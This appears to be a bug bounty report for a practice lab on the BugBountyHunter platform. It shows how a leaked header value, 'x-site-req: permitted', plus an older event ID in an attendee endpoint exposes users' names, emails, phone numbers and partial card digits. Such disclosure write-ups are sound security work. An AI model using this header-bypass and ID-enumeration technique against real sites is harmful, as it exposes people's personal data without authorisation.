BugBountyHunter

Description

Hello Sean,

I found out that visiting the /hackerback.html endpoint results in an interesting inline javascript in the source code of the page:

    <script>
       function getAttendees() {
        var attending = false;

        if (attending == true) {
            sendRequest("/attendees/event.php?q=560720");
       }
    </script>

Simply opening the /attendees/event.php?q=560720 results in an empty JSON page, however, from my previous knowledge on the application I had found that visiting /drpanel/drapi/sitesettings.php leaks an interesting JSON array:

{

    "site": "firstblood",
    "process": "eventhandler",
    "x-required": [
        {
            "x-site-req": "permitted"
        },
        {
            "type": "request"
        }
    ],
    "active": true

}

I understood that x-site-req should be used as an HTTP header, so adding x-site-req: permitted to the HTTP request header of /attendees/event.php?q=560720 leads to disclosure about the "hackerbank" event, you can add the x-site-req: permitted header using burp suite:

When I was inspecting the returned JSON, I found an interesting JSON parameter "old_eventID":"560700"

So I changed the /attendees/event.php?q=560720 endpoint to /attendees/event.php?q=560700 (keeping the x-site-req: permitted header) and there are critical PII leaks of users:

An example of the critical PII leakages such as "last_4_CC":

{

    "name": "Sean R",
    "email": "[email protected]",
    "confirmed": true,
    "contactNumber": "+44 141 496 0250",
    "last_4_CC": "9090"

},

Impact

• Critical PII Leakage of users

If you need any further assistance let me know.

Best Regards,

HolyBugx